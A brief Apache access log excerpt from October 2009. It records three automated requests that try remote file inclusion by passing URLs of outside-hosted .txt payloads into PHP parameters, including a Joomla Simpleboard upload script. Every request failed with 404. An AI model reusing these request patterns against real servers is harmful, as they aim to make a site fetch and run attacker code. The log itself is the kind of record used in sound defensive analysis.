200.144.1.134 - - [18/Oct/2009:04:14:13 -0400] "GET /logs/error_log.Q109060500/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
190.97.219.4 - - [18/Oct/2009:04:14:13 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:14:15 -0400] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
